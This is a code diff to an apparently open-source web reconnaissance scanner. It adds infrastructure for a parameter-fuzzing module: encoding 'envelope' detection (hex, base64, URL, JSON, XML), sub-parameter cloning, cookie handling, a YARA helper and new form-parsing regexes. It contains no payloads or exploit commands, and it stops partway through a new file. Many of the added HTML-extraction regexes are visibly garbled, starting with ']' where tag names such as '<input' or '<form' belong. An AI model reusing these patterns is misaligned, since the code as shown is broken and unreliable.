diff --git a/README.md b/README.md index a9782bb62b..34c742fa58 100644 --- a/README.md +++ b/README.md @@ -383,6 +383,7 @@ For details, see [Configuration](https://www.blacklanternsecurity.com/bbot/Stabl - [List of Modules](https://www.blacklanternsecurity.com/bbot/Stable/modules/list_of_modules) - [Nuclei](https://www.blacklanternsecurity.com/bbot/Stable/modules/nuclei) - [Custom YARA Rules](https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules) + - [Lightfuzz](https://www.blacklanternsecurity.com/bbot/Stable/modules/lightfuzz) - **Misc** - [Contribution](https://www.blacklanternsecurity.com/bbot/Stable/contribution) - [Release History](https://www.blacklanternsecurity.com/bbot/Stable/release_history) diff --git a/bbot/core/event/base.py b/bbot/core/event/base.py index 2c4718844c..aa7715e71c 100644 --- a/bbot/core/event/base.py +++ b/bbot/core/event/base.py @@ -9,9 +9,9 @@ import ipaddress import traceback -from copy import copy from pathlib import Path from typing import Optional +from copy import copy, deepcopy from contextlib import suppress from radixtarget import RadixTarget from pydantic import BaseModel, field_validator @@ -40,6 +40,7 @@ validators, get_file_extension, ) +from bbot.core.helpers.web.envelopes import BaseEnvelope log = logging.getLogger("bbot.core.event") @@ -592,6 +593,10 @@ def parent(self, parent): elif not self._dummy: log.warning(f"Tried to set invalid parent on {self}: (got: {repr(parent)} ({type(parent)}))") + @property + def children(self): + return [] + @property def parent_id(self): parent_id = getattr(self.get_parent(), "id", None) @@ -646,6 +651,13 @@ def get_parents(self, omit=False, include_self=False): e = parent return parents + def clone(self): + # Create a shallow copy of the event first + cloned_event = copy(self) + # Re-assign a new UUID + cloned_event._uuid = uuid.uuid4() + return cloned_event + def _host(self): return "" @@ -827,7 +839,13 @@ def json(self, mode="json", siem_friendly=False): j["discovery_path"] = self.discovery_path j["parent_chain"] = self.parent_chain + # parameter envelopes + parameter_envelopes = getattr(self, "envelopes", None) + if parameter_envelopes is not None: + j["envelopes"] = parameter_envelopes.to_dict() + # normalize non-primitive python objects + for k, v in list(j.items()): if k == "data": continue @@ -1327,12 +1345,56 @@ class URL_HINT(URL_UNVERIFIED): class WEB_PARAMETER(DictHostEvent): + @property + def children(self): + # if we have any subparams, raise a new WEB_PARAMETER for each one + children = [] + envelopes = getattr(self, "envelopes", None) + if envelopes is not None: + subparams = sorted(list(self.envelopes.get_subparams())) + + if envelopes.selected_subparam is None: + current_subparam = subparams[0] + envelopes.selected_subparam = current_subparam[0] + if len(subparams) > 1: + for subparam, _ in subparams[1:]: + clone = self.clone() + clone.envelopes = deepcopy(envelopes) + clone.envelopes.selected_subparam = subparam + clone.parent = self + children.append(clone) + return children + + def sanitize_data(self, data): + original_value = data.get("original_value", None) + if original_value is not None: + try: + envelopes = BaseEnvelope.detect(original_value) + setattr(self, "envelopes", envelopes) + except ValueError as e: + log.verbose(f"Error detecting envelopes for {self}: {e}") + return data + def _data_id(self): # dedupe by url:name:param_type url = self.data.get("url", "") name = self.data.get("name", "") param_type = self.data.get("type", "") - return 
f"{url}:{name}:{param_type}" + envelopes = getattr(self, "envelopes", "") + subparam = getattr(envelopes, "selected_subparam", "") + + return f"{url}:{name}:{param_type}:{subparam}" + + def _outgoing_dedup_hash(self, event): + return hash( + ( + str(event.host), + event.data["url"], + event.data.get("name", ""), + event.data.get("type", ""), + event.data.get("envelopes", ""), + ) + ) def _url(self): return self.data["url"] @@ -1768,7 +1830,6 @@ def make_event( data = net.network_address event_class = globals().get(event_type, DefaultEvent) - return event_class( data, event_type=event_type, @@ -1828,7 +1889,6 @@ def event_from_json(j, siem_friendly=False): resolved_hosts = j.get("resolved_hosts", []) event._resolved_hosts = set(resolved_hosts) - event.timestamp = datetime.datetime.fromisoformat(j["timestamp"]) event.scope_distance = j["scope_distance"] parent_id = j.get("parent", None) diff --git a/bbot/core/helpers/diff.py b/bbot/core/helpers/diff.py index 1ea5de0e02..64c1b1e6a5 100644 --- a/bbot/core/helpers/diff.py +++ b/bbot/core/helpers/diff.py @@ -15,22 +15,24 @@ def __init__( parent_helper, method="GET", data=None, + json=None, allow_redirects=False, include_cache_buster=True, headers=None, cookies=None, - timeout=15, + timeout=10, ): self.parent_helper = parent_helper self.baseline_url = baseline_url self.include_cache_buster = include_cache_buster self.method = method self.data = data + self.json = json self.allow_redirects = allow_redirects self._baselined = False self.headers = headers self.cookies = cookies - self.timeout = 15 + self.timeout = 10 @staticmethod def merge_dictionaries(headers1, headers2): @@ -53,12 +55,13 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, headers=self.headers, cookies=self.cookies, retries=2, timeout=self.timeout, ) - await self.parent_helper.sleep(1) + await self.parent_helper.sleep(0.5) # put random parameters in URL, headers, and cookies get_params = {self.parent_helper.rand_string(6): self.parent_helper.rand_string(6)} @@ -76,12 +79,12 @@ async def _baseline(self): follow_redirects=self.allow_redirects, method=self.method, data=self.data, + json=self.json, retries=2, timeout=self.timeout, ) self.baseline = baseline_1 - if baseline_1 is None or baseline_2 is None: log.debug("HTTP error while establishing baseline, aborting") raise HttpCompareError( @@ -90,6 +93,7 @@ async def _baseline(self): if baseline_1.status_code != baseline_2.status_code: log.debug("Status code not stable during baseline, aborting") raise HttpCompareError("Can't get baseline from source URL") + try: baseline_1_json = xmltodict.parse(baseline_1.text) baseline_2_json = xmltodict.parse(baseline_2.text) @@ -105,11 +109,9 @@ async def _baseline(self): for k in ddiff.keys(): for x in list(ddiff[k]): - log.debug(f"Added {k} filter for path: {x.path()}") self.ddiff_filters.append(x.path()) self.baseline_json = baseline_1_json - self.baseline_ignore_headers = [ h.lower() for h in [ @@ -167,7 +169,6 @@ def compare_body(self, content_1, content_2): if len(ddiff.keys()) == 0: return True else: - log.debug(ddiff) return False async def compare( @@ -178,6 +179,7 @@ async def compare( check_reflection=False, method="GET", data=None, + json=None, allow_redirects=False, timeout=None, ): @@ -208,6 +210,7 @@ async def compare( follow_redirects=allow_redirects, method=method, data=data, + json=json, timeout=timeout, ) diff --git a/bbot/core/helpers/helper.py b/bbot/core/helpers/helper.py index 78ccf67155..e863723801 
100644 --- a/bbot/core/helpers/helper.py +++ b/bbot/core/helpers/helper.py @@ -12,6 +12,7 @@ from .regex import RegexHelper from .wordcloud import WordCloud from .interactsh import Interactsh +from .yara_helper import YaraHelper from .depsinstaller import DepsInstaller from .async_helpers import get_event_loop @@ -85,6 +86,7 @@ def __init__(self, preset): self._cloud = None self.re = RegexHelper(self) + self.yara = YaraHelper(self) self._dns = None self._web = None self.config_aware_validators = self.validators.Validators(self) @@ -129,7 +131,8 @@ def http_compare( cookies=None, method="GET", data=None, - timeout=15, + json=None, + timeout=10, ): return HttpCompare( url, @@ -141,6 +144,7 @@ def http_compare( timeout=timeout, method=method, data=data, + json=json, ) def temp_filename(self, extension=None): diff --git a/bbot/core/helpers/misc.py b/bbot/core/helpers/misc.py index 92c9e523fd..6eda16e4da 100644 --- a/bbot/core/helpers/misc.py +++ b/bbot/core/helpers/misc.py @@ -2,6 +2,7 @@ import sys import copy import json +import math import random import string import asyncio @@ -9,6 +10,7 @@ import ipaddress import regex as re import subprocess as sp + from pathlib import Path from contextlib import suppress from unidecode import unidecode # noqa F401 @@ -797,17 +799,14 @@ def recursive_decode(data, max_depth=5): return data -rand_pool = string.ascii_lowercase -rand_pool_digits = rand_pool + string.digits - - -def rand_string(length=10, digits=True): +def rand_string(length=10, digits=True, numeric_only=False): """ Generates a random string of specified length. Args: length (int, optional): The length of the random string. Defaults to 10. digits (bool, optional): Whether to include digits in the string. Defaults to True. + numeric_only (bool, optional): Whether to generate a numeric-only string. Defaults to False. Returns: str: A random string of the specified length. @@ -819,11 +818,17 @@ def rand_string(length=10, digits=True): 'ap4rsdtg5iw7ey7y3oa5' >>> rand_string(30, digits=False) 'xdmyxtglqfzqktngkesyulwbfrihva' + >>> rand_string(15, numeric_only=True) + '934857349857395' """ - pool = rand_pool - if digits: - pool = rand_pool_digits - return "".join([random.choice(pool) for _ in range(int(length))]) + if numeric_only: + pool = string.digits + elif digits: + pool = string.ascii_lowercase + string.digits + else: + pool = string.ascii_lowercase + + return "".join(random.choice(pool) for _ in range(length)) def truncate_string(s, n): @@ -885,7 +890,7 @@ def extract_params_xml(xml_data, compare_mode="getparam"): xml_data (str): XML-formatted string containing elements. Returns: - set: A set of tuples containing the tags and their corresponding text values present in the XML object. + set: A set of tuples containing the tags and their corresponding sanitized text values present in the XML object. Raises: Returns an empty set if ParseError occurs. 
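Editorial note: the hunk below adds sanitization of extracted XML text values. A minimal standalone sketch of that behavior (illustrative names, not BBOT's API — values are stripped, then URL-encoded with quote(..., safe="") so they survive later insertion into URLs):

import xml.etree.ElementTree as ET
from urllib.parse import quote

def tag_value_pairs(xml_data):
    root = ET.fromstring(xml_data)
    pairs = set()
    stack = [root]
    while stack:
        element = stack.pop()
        # mirror the sanitization added in the next hunk
        text_value = element.text.strip() if element.text else None
        sanitized_value = quote(text_value, safe="") if text_value else None
        pairs.add((element.tag, sanitized_value))
        stack.extend(element)  # iterate child elements depth-first
    return pairs

print(tag_value_pairs("<user><name>jane doe</name><id>42</id></user>"))
# e.g. {('user', None), ('id', '42'), ('name', 'jane%20doe')} (set order varies)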
@@ -907,7 +912,10 @@ def extract_params_xml(xml_data, compare_mode="getparam"): while stack: current_element = stack.pop() if validate_parameter(current_element.tag, compare_mode): - tag_value_pairs.add((current_element.tag, current_element.text)) + # Sanitize the text value + text_value = current_element.text.strip() if current_element.text else None + sanitized_value = quote(text_value, safe="") if text_value else None + tag_value_pairs.add((current_element.tag, sanitized_value)) for child in current_element: stack.append(child) return tag_value_pairs @@ -921,6 +929,7 @@ def extract_params_xml(xml_data, compare_mode="getparam"): "getparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "postparam": {chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="}, "cookie": {chr(c) for c in range(33, 127) if chr(c) not in '()<>@,;:"/[]?={} \t'}, + "bodyjson": set(chr(c) for c in range(33, 127) if chr(c) not in ":/?#[]@!$&'()*+,;="), } @@ -1874,6 +1883,7 @@ def make_table(rows, header, **kwargs): | row2 | row2 | +-----------+-----------+ """ + from tabulate import tabulate # fix IndexError: list index out of range @@ -2772,6 +2782,21 @@ def clean_dict(d, *key_names, fuzzy=False, exclude_keys=None, _prev_key=None): return d +def calculate_entropy(data): + """Calculate the Shannon entropy of a byte sequence""" + if not data: + return 0 + frequency = {} + for byte in data: + if byte in frequency: + frequency[byte] += 1 + else: + frequency[byte] = 1 + data_len = len(data) + entropy = -sum((count / data_len) * math.log2(count / data_len) for count in frequency.values()) + return entropy + + top_ports_cache = None @@ -2825,3 +2850,15 @@ def clean_requirement(req_string): dist = distribution("bbot") return [clean_requirement(r) for r in dist.requires] + + +def is_printable(s): + """ + Check if a string is printable + """ + if not isinstance(s, str): + raise ValueError(f"Expected a string, got {type(s)}") + + # Exclude control characters that break display/printing + s = set(s) + return all(ord(c) >= 32 or c in "\t\n\r" for c in s) diff --git a/bbot/core/helpers/regexes.py b/bbot/core/helpers/regexes.py index 6a0a27456e..122ff79af2 100644 --- a/bbot/core/helpers/regexes.py +++ b/bbot/core/helpers/regexes.py @@ -114,27 +114,64 @@ # For use with excavate parameters extractor input_tag_regex = re.compile( - r"]+?name=[\"\']?([\.$\w]+)[\"\']?(?:[^>]*?value=[\"\']([=+\/\w]*)[\"\'])?[^>]*>" + r"]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?\svalue=[\"\']?([:%\-\._=+\/\w\s]*)[\"\']?[^>]*?>" ) -jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") -jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") +input_tag_regex2 = re.compile( + r"]*?\svalue=[\"\']?([:\-%\._=+\/\w\s]*)[\"\']?[^>]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" +) +input_tag_novalue_regex = re.compile(r"]*\b\svalue=)[^>]*?\sname=[\"\']?([\-\._=+\/\w]*)[\"\']?[^>]*?>") +# jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=") +# jquery_get_regex = re.compile(r"\$.get\([\'\"].+[\'\"].+\{(.+)\}") +# jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}") a_tag_regex = re.compile(r"]*href=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") img_tag_regex = re.compile(r"]*src=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)") get_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) 
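Editorial note: each form regex here gains a mirrored "2" variant (get_form_regex2, post_form_regex2 below) because attribute order in HTML is arbitrary and these patterns are order-sensitive. A minimal sketch with simplified patterns (not the exact ones in this file):

import re

method_then_action = re.compile(r"<form[^>]*\bmethod=[\"']?get[\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)", re.IGNORECASE)
action_then_method = re.compile(r"<form[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?get[\"']?", re.IGNORECASE)

for snippet in ('<form method="get" action="/search">', '<form action="/search" method="get">'):
    match = method_then_action.search(snippet) or action_then_method.search(snippet)
    print(match.group(1))  # prints /search for both attribute orders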
+get_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) post_form_regex = re.compile( - r"]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + r"]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex2 = re.compile( + r"]*\baction=[\"']?([^\s\"'<>]+)[\"']?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", + re.DOTALL, +) +post_form_regex_noaction = re.compile( + r"]*(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)?[^>]*\bmethod=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>", re.DOTALL, ) +generic_form_regex = re.compile( + r"]*\bmethod=)[^>]+(?:\baction=[\"']?([^\s\"'<>]+)[\"']?)[^>]*>([\s\S]*?)<\/form>", + re.IGNORECASE | re.DOTALL, +) + select_tag_regex = re.compile( - r"]+?name=[\"\']?(\w+)[\"\']?[^>]*>(?:\s*]*?value=[\"\'](\w*)[\"\']?[^>]*>)?" + r"]+?name=[\"\']?([_\-\.\w]+)[\"\']?[^>]*>(?:\s*]*?value=[\"\']?([_\.\-\w]*)[\"\']?[^>]*>)?", + re.IGNORECASE | re.DOTALL, ) + textarea_tag_regex = re.compile( - r']*\bname=["\']?(\w+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL + r"]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?\svalue=[\"\']?([:%\-\._=+\/\w]*)[\"\']?[^>]*?>" +) +textarea_tag_regex2 = re.compile( + r"]*?\svalue=[\"\']?([:\-%\._=+\/\w]*)[\"\']?[^>]*?\sname=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" +) +textarea_tag_novalue_regex = re.compile( + r']*\bname=["\']?([_\-\.\w]+)["\']?[^>]*>(.*?)', re.IGNORECASE | re.DOTALL +) + +button_tag_regex = re.compile( + r"]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?value=[\"\']?([%\-\._=+\/\w]*)[\"\']?[^>]*?>" +) +button_tag_regex2 = re.compile( + r"]*?value=[\"\']?([\-%\._=+\/\w]*)[\"\']?[^>]*?name=[\"\']?([\-\._=+\/\w]+)[\"\']?[^>]*?>" ) -tag_attribute_regex = re.compile(r"<[^>]*(?:href|action|src)\s*=\s*[\"\']?(?!mailto:)([^\s\'\"\>]+)[\"\']?[^>]*>") +tag_attribute_regex = re.compile(r"<[^>]*(?:href|action|src)\s*=\s*[\"\']?(?!mailto:)([^\'\"\>]+)[\"\']?[^>]*>") valid_netloc = r"[^\s!@#$%^&()=/?\\'\";~`<>]+" diff --git a/bbot/core/helpers/url.py b/bbot/core/helpers/url.py index 5482e54c51..91c7d8a01b 100644 --- a/bbot/core/helpers/url.py +++ b/bbot/core/helpers/url.py @@ -32,7 +32,10 @@ def parse_url(url): return urlparse(url) -def add_get_params(url, params): +def add_get_params(url, params, encode=True): + def _no_encode_quote(s, safe="/", encoding=None, errors=None): + return s + """ Add or update query parameters to the given URL. 
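Editorial note: a short sketch of how the new encode=False path works. urlencode() lets the caller swap out its quoting function via quote_via, so passing an identity function like the _no_encode_quote helper added above leaves parameter values unescaped:

from urllib.parse import urlencode

def identity_quote(s, safe="/", encoding=None, errors=None):
    # urlencode calls quote_via(value, safe, encoding, errors); return the value untouched
    return s

params = {"redirect": "https://example.com/?a=1"}
print(urlencode(params, doseq=True))                            # redirect=https%3A%2F%2Fexample.com%2F%3Fa%3D1
print(urlencode(params, doseq=True, quote_via=identity_quote))  # redirect=https://example.com/?a=1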
@@ -53,10 +56,23 @@ def add_get_params(url, params): >>> add_get_params('https://www.evilcorp.com?foo=1', {'foo': 2}) ParseResult(scheme='https', netloc='www.evilcorp.com', path='', params='', query='foo=2', fragment='') """ - parsed = parse_url(url) - old_params = dict(parse_qs(parsed.query)) - old_params.update(params) - return parsed._replace(query=urlencode(old_params, doseq=True)) + parsed = urlparse(url) + query_params = parsed.query.split("&") + + existing_params = {} + for param in query_params: + if "=" in param: + k, v = param.split("=", 1) + existing_params[k] = v + + existing_params.update(params) + + if encode: + new_query = urlencode(existing_params, doseq=True) + else: + new_query = urlencode(existing_params, doseq=True, quote_via=_no_encode_quote) + + return parsed._replace(query=new_query) def get_get_params(url): diff --git a/bbot/core/helpers/web/client.py b/bbot/core/helpers/web/client.py index 737a2f9dcb..1ab6b342db 100644 --- a/bbot/core/helpers/web/client.py +++ b/bbot/core/helpers/web/client.py @@ -52,7 +52,7 @@ def __init__(self, *args, **kwargs): if http_debug: log.trace(f"Creating AsyncClient: {args}, {kwargs}") - self._persist_cookies = kwargs.pop("persist_cookies", True) + self._persist_cookies = kwargs.pop("persist_cookies", False) # timeout http_timeout = self._web_config.get("http_timeout", 20) @@ -63,11 +63,18 @@ def __init__(self, *args, **kwargs): headers = kwargs.get("headers", None) if headers is None: headers = {} + + # cookies + cookies = kwargs.get("cookies", None) + if cookies is None: + cookies = {} + # user agent user_agent = self._web_config.get("user_agent", "BBOT") if "User-Agent" not in headers: headers["User-Agent"] = user_agent kwargs["headers"] = headers + kwargs["cookies"] = cookies # proxy proxies = self._web_config.get("http_proxy", None) kwargs["proxies"] = proxies @@ -78,10 +85,23 @@ def __init__(self, *args, **kwargs): self._cookies = DummyCookies() def build_request(self, *args, **kwargs): - request = super().build_request(*args, **kwargs) - # add custom headers if the URL is in-scope - # TODO: re-enable this - if self._target.in_scope(str(request.url)): + if args: + url = args[0] + kwargs["url"] = url + url = kwargs["url"] + + target_in_scope = self._target.in_scope(str(url)) + + if target_in_scope: + if not kwargs.get("cookies", None): + kwargs["cookies"] = {} + for ck, cv in self._web_config.get("http_cookies", {}).items(): + if ck not in kwargs["cookies"]: + kwargs["cookies"][ck] = cv + + request = super().build_request(**kwargs) + + if target_in_scope: for hk, hv in self._web_config.get("http_headers", {}).items(): hv = str(hv) # don't clobber headers diff --git a/bbot/core/helpers/web/engine.py b/bbot/core/helpers/web/engine.py index de69e18766..9e1c173bc9 100644 --- a/bbot/core/helpers/web/engine.py +++ b/bbot/core/helpers/web/engine.py @@ -8,7 +8,7 @@ from contextlib import asynccontextmanager from bbot.core.engine import EngineServer -from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain +from bbot.core.helpers.misc import bytes_to_human, human_to_bytes, get_exception_chain, truncate_string log = logging.getLogger("bbot.core.helpers.web.engine") @@ -203,6 +203,14 @@ async def _acatch(self, url, raise_error): else: log.trace(f"Error with request to URL: {url}: {e}") log.trace(traceback.format_exc()) + except httpx.InvalidURL as e: + if raise_error: + raise + else: + log.warning( + f"Invalid URL (possibly due to dangerous redirect) on request to : {url}: {truncate_string(e, 200)}" + ) + 
log.trace(traceback.format_exc())
         except ssl.SSLError as e:
             msg = f"SSL error with request to URL: {url}: {e}"
             if raise_error:
diff --git a/bbot/core/helpers/web/envelopes.py b/bbot/core/helpers/web/envelopes.py
new file mode 100644
index 0000000000..3858273fe0
--- /dev/null
+++ b/bbot/core/helpers/web/envelopes.py
@@ -0,0 +1,352 @@
+import json
+import base64
+import binascii
+import xmltodict
+from contextlib import suppress
+from urllib.parse import unquote, quote
+from xml.parsers.expat import ExpatError
+
+from bbot.core.helpers.misc import is_printable
+
+
+# TODO: This logic is perfect for extracting params. We should expand it outwards to include other higher-level envelopes:
+# - QueryStringEnvelope
+# - MultipartFormEnvelope
+# - HeaderEnvelope
+# - CookieEnvelope
+#
+# Once we start ingesting HTTP_REQUEST events, this will make them instantly fuzzable
+
+
+class EnvelopeChildTracker(type):
+    """
+    Keeps track of all the child envelope classes
+    """
+
+    children = []
+
+    def __new__(mcs, name, bases, class_dict):
+        # Create the class
+        cls = super().__new__(mcs, name, bases, class_dict)
+        # Don't register the base class itself
+        if bases and not name.startswith("Base"):  # Only register if it has base classes (i.e., is a child)
+            EnvelopeChildTracker.children.append(cls)
+            EnvelopeChildTracker.children.sort(key=lambda x: x.priority)
+        return cls
+
+
+class BaseEnvelope(metaclass=EnvelopeChildTracker):
+    __slots__ = ["subparams", "selected_subparam", "singleton"]
+
+    # determines the order of the envelope detection
+    priority = 5
+    # whether the envelope is the final format, e.g. raw text/binary
+    end_format = False
+    ignore_exceptions = (Exception,)
+    envelope_classes = EnvelopeChildTracker.children
+    # transparent envelopes (i.e. TextEnvelope) are not counted as envelopes or included in the finding descriptions
+    transparent = False
+
+    def __init__(self, s):
+        unpacked_data = self.unpack(s)
+
+        if self.end_format:
+            inner_envelope = unpacked_data
+        else:
+            inner_envelope = self.detect(unpacked_data)
+
+        self.selected_subparam = None
+        # if we have subparams, our inner envelope will be a dictionary
+        if isinstance(inner_envelope, dict):
+            self.subparams = inner_envelope
+            self.singleton = False
+        # otherwise if we just have one value, we make a dictionary with a default key
+        else:
+            self.subparams = {"__default__": inner_envelope}
+            self.singleton = True
+
+    @property
+    def final_envelope(self):
+        try:
+            return self.unpacked_data(recursive=False).final_envelope
+        except AttributeError:
+            return self
+
+    @property
+    def friendly_name(self):
+        # subclasses that need a human-readable label shadow this property with a plain
+        # class attribute; referencing self.friendly_name here would recurse infinitely,
+        # so fall back straight to the class name
+        return self.name
+
+    def pack(self, data=None):
+        if data is None:
+            data = self.unpacked_data(recursive=False)
+        with suppress(AttributeError):
+            data = data.pack()
+        return self._pack(data)
+
+    def unpack(self, s):
+        return self._unpack(s)
+
+    def _pack(self, s):
+        """
+        Encodes the string using the class's unique encoder (adds the outer envelope)
+        """
+        raise NotImplementedError("Envelope.pack() must be implemented")
+
+    def _unpack(self, s):
+        """
+        Decodes the string using the class's unique encoder (removes the outer envelope)
+        """
+        raise NotImplementedError("Envelope.unpack() must be implemented")
+
+    def unpacked_data(self, recursive=True):
+        try:
+            unpacked = self.subparams["__default__"]
+            if recursive:
+                with suppress(AttributeError):
+                    return unpacked.unpacked_data(recursive=recursive)
+            return unpacked
+        except KeyError:
+            return self.subparams
+
+    @classmethod
+    
def detect(cls, s): + """ + Detects the type of envelope used to encode the packed_data + """ + if not isinstance(s, str): + raise ValueError(f"Invalid data passed to detect(): {s} ({type(s)})") + # if the value is empty, we just return the text envelope + if not s.strip(): + return TextEnvelope(s) + for envelope_class in cls.envelope_classes: + with suppress(*envelope_class.ignore_exceptions): + envelope = envelope_class(s) + if envelope is not False: + # make sure the envelope is not just the original string, to prevent unnecessary envelope detection. For example, "10" is technically valid JSON, but nothing is being encapsulated + if str(envelope.unpacked_data()) == s: + return TextEnvelope(s) + else: + return envelope + del envelope + raise Exception(f"No envelope detected for data: '{s}' ({type(s)})") + + def get_subparams(self, key=None, data=None, recursive=True): + if data is None: + data = self.unpacked_data(recursive=recursive) + if key is None: + key = [] + + if isinstance(data, dict): + for k, v in data.items(): + full_key = key + [k] + if isinstance(v, dict): + yield from self.get_subparams(full_key, v) + else: + yield full_key, v + else: + yield [], data + + def get_subparam(self, key=None, recursive=True): + if key is None: + key = self.selected_subparam + envelope = self + if recursive: + envelope = self.final_envelope + data = envelope.unpacked_data(recursive=False) + if key is None: + if envelope.singleton: + key = [] + else: + raise ValueError("No subparam selected") + else: + for segment in key: + data = data[segment] + return data + + def set_subparam(self, key=None, value=None, recursive=True): + envelope = self + if recursive: + envelope = self.final_envelope + + # if there's only one value to set, we can just set it directly + if envelope.singleton: + envelope.subparams["__default__"] = value + return + + # if key isn't specified, use the selected subparam + if key is None: + key = self.selected_subparam + if key is None: + raise ValueError(f"{self} -> {envelope}: No subparam selected") + + data = envelope.unpacked_data(recursive=False) + for segment in key[:-1]: + data = data[segment] + data[key[-1]] = value + + @property + def name(self): + return self.__class__.__name__ + + @property + def num_envelopes(self): + num_envelopes = 0 if self.transparent else 1 + if self.end_format: + return num_envelopes + for envelope in self.subparams.values(): + with suppress(AttributeError): + num_envelopes += envelope.num_envelopes + return num_envelopes + + @property + def summary(self): + if self.transparent: + return "" + self_string = f"{self.friendly_name}" + with suppress(AttributeError): + child_envelope = self.unpacked_data(recursive=False) + child_summary = child_envelope.summary + if child_summary: + self_string += f" -> {child_summary}" + + if self.selected_subparam: + self_string += f" [{'.'.join(self.selected_subparam)}]" + return self_string + + def to_dict(self): + return self.summary + + def __str__(self): + return self.summary + + __repr__ = __str__ + + +class HexEnvelope(BaseEnvelope): + """ + Hexadecimal encoding + """ + + friendly_name = "Hexadecimal-Encoded" + + ignore_exceptions = (ValueError, UnicodeDecodeError) + + def _pack(self, s): + return s.encode().hex() + + def _unpack(self, s): + return bytes.fromhex(s).decode() + + +class B64Envelope(BaseEnvelope): + """ + Base64 encoding + """ + + friendly_name = "Base64-Encoded" + + ignore_exceptions = (binascii.Error, UnicodeDecodeError, ValueError) + + def unpack(self, s): + # it's easy to have a small value 
that accidentally decodes to base64 + if len(s) < 8 and not s.endswith("="): + raise ValueError("Data is too small to be sure") + return super().unpack(s) + + def _pack(self, s): + return base64.b64encode(s.encode()).decode() + + def _unpack(self, s): + return base64.b64decode(s).decode() + + +class URLEnvelope(BaseEnvelope): + """ + URL encoding + """ + + friendly_name = "URL-Encoded" + + def unpack(self, s): + unpacked = super().unpack(s) + if unpacked == s: + raise Exception("Data is not URL-encoded") + return unpacked + + def _pack(self, s): + return quote(s) + + def _unpack(self, s): + return unquote(s) + + +class TextEnvelope(BaseEnvelope): + """ + Text encoding + """ + + end_format = True + # lowest priority means text is the ultimate fallback + priority = 10 + transparent = True + ignore_exceptions = () + + def _pack(self, s): + return s + + def _unpack(self, s): + if not is_printable(s): + raise ValueError(f"Non-printable data detected in TextEnvelope: '{s}' ({type(s)})") + return s + + +# class BinaryEnvelope(BaseEnvelope): +# """ +# Binary encoding +# """ +# end_format = True + +# def pack(self, s): +# return s + +# def unpack(self, s): +# if is_printable(s): +# raise Exception("Non-binary data detected in BinaryEnvelope") +# return s + + +class JSONEnvelope(BaseEnvelope): + """ + JSON encoding + """ + + friendly_name = "JSON-formatted" + end_format = True + priority = 8 + ignore_exceptions = (json.JSONDecodeError,) + + def _pack(self, s): + return json.dumps(s) + + def _unpack(self, s): + return json.loads(s) + + +class XMLEnvelope(BaseEnvelope): + """ + XML encoding + """ + + friendly_name = "XML-formatted" + end_format = True + priority = 9 + ignore_exceptions = (ExpatError,) + + def _pack(self, s): + return xmltodict.unparse(s) + + def _unpack(self, s): + return xmltodict.parse(s) diff --git a/bbot/core/helpers/web/web.py b/bbot/core/helpers/web/web.py index 23f7a8c607..41da460dbc 100644 --- a/bbot/core/helpers/web/web.py +++ b/bbot/core/helpers/web/web.py @@ -349,6 +349,7 @@ async def curl(self, *args, **kwargs): curl_command.append("-k") headers = kwargs.get("headers", {}) + cookies = kwargs.get("cookies", {}) ignore_bbot_global_settings = kwargs.get("ignore_bbot_global_settings", False) @@ -362,10 +363,17 @@ async def curl(self, *args, **kwargs): if "User-Agent" not in headers: headers["User-Agent"] = user_agent - # only add custom headers if the URL is in-scope + # only add custom headers / cookies if the URL is in-scope if self.parent_helper.preset.in_scope(url): for hk, hv in self.web_config.get("http_headers", {}).items(): - headers[hk] = hv + # Only add the header if it doesn't already exist in the headers dictionary + if hk not in headers: + headers[hk] = hv + + for ck, cv in self.web_config.get("http_cookies", {}).items(): + # don't clobber cookies + if ck not in cookies: + cookies[ck] = cv # add the timeout if "timeout" not in kwargs: diff --git a/bbot/core/helpers/yara_helper.py b/bbot/core/helpers/yara_helper.py new file mode 100644 index 0000000000..bc9e914cd3 --- /dev/null +++ b/bbot/core/helpers/yara_helper.py @@ -0,0 +1,51 @@ +import yara + + +class YaraHelper: + def __init__(self, parent_helper): + self.parent_helper = parent_helper + + def compile_strings(self, strings: list[str], nocase=False): + """ + Compile a list of strings into a YARA rule + """ + # Format each string as a YARA string definition + yara_strings = [] + for i, s in 